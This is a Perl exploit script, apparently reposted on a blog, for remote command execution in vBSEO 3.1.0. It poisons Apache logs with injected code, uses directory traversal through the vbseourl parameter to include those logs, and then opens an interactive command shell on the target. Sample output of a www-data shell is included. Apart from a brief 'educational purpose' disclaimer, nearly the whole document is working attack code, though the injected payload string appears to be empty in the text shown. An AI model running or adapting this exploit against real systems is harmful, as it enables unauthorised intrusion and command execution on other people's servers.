#!/usr/bin/perl #################################################################### # vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit # vendor: http://www.vbseo.com/ # # Author: Jose Luis Gongora Fernandez (a.k.a) JosS # twitter: @JossGongora # mail: joss.xroot(0x40)gmail(0x2e)com # site: http://www.hack0wn.com/ # # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # thanks: CWH Underground # #################################################################### # OUTPUT: # # Trying to Inject the Code... # Successfully injected in ../../../../../../../var/log/apache2/access.log # # [shell]:~$ id # uid=33(www-data) gid=33(www-data) groups=33(www-data) # [shell]:~$ uname -a # Linux mediapc 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux # [shell]:~$ exit # joss@h4x0rz:~/Desktop$ use LWP::UserAgent; use IO::Socket; use LWP::Simple; @apache=( "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../etc/httpd/logs/acces_log", "../../../../../../../etc/httpd/logs/acces.log", "../../../../../../../etc/httpd/logs/error_log", "../../../../../../../etc/httpd/logs/error.log", "../../../../../../../var/www/logs/access_log", "../../../../../../../var/www/logs/access.log", "../../../../../../../usr/local/apache/logs/access_log", "../../../../../../../usr/local/apache/logs/access.log", "../../../../../../../var/log/apache/access_log", "../../../../../../../var/log/apache2/access_log", "../../../../../../../var/log/apache/access.log", "../../../../../../../var/log/apache2/access.log", "../../../../../../../var/log/access_log", "../../../../../../../var/log/access.log", "../../../../../../../var/www/logs/error_log", "../../../../../../../var/www/logs/error.log", "../../../../../../../usr/local/apache/logs/error_log", "../../../../../../../usr/local/apache/logs/error.log", "../../../../../../../var/log/apache/error_log", "../../../../../../../var/log/apache2/error_log", "../../../../../../../var/log/apache/error.log", "../../../../../../../var/log/apache2/error.log", "../../../../../../../var/log/error_log", "../../../../../../../var/log/error.log", "../../../../../var/log/access_log", "../../../../../var/log/access_log" ); system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "####################################################################### "; print "# vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit # "; print "####################################################################### "; if (!$ARGV[0]) { print "Usage: perl exploit.pl [host] "; print " perl exploit.pl localhost "; exit;} $host=$ARGV[0]; $path="/vbseo.php?vbseoembedd=1&vbseourl="; # change if it is necesary # if ( $host =~ /^http:/ ) {$host =~ s/http:////g;} print " Trying to Inject the Code... "; $CODE=""; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host. "; print $socket "GET /images/"."##%$$%##".$CODE."##%$$%##" . "HTTP/1.1"; print $socket "Host: ".$host." "; print $socket "Connection: close "; close($socket); if ( $host !~ /^http:/ ) {$host = "http://" . $host;} foreach $getlog(@apache) { chomp($getlog); $find= $host.$path.$getlog; # $find= $host.$path.$getlog.""; $xpl = LWP::UserAgent->new() or die "Could not initialize browser "; $req = HTTP::Request->new(GET => $find); $res = $xpl->request($req); $info = $res->content; if($info =~ /##\%$$\%##/) # change if it is necesary {print "Successfully injected in $getlog ";$log=$getlog; last;} } print "[shell]:~$ "; chomp( $cmd =); while($cmd !~ "exit") { $shell= $host.$path.$log."&cmd=$cmd"; # $shell= $host.$path.$log."&cmd=$cmd"; $xpl = LWP::UserAgent->new() or die "Could not initialize browser "; $req = HTTP::Request->new(GET => $shell); $res = $xpl->request($req); $info = $res->content; if ($info =~ /##%$$%##(.*?)##%$$%##/sg) {print $1;} print "[shell]:~$ "; chomp( $cmd = ); }
0 comments:
Post a Comment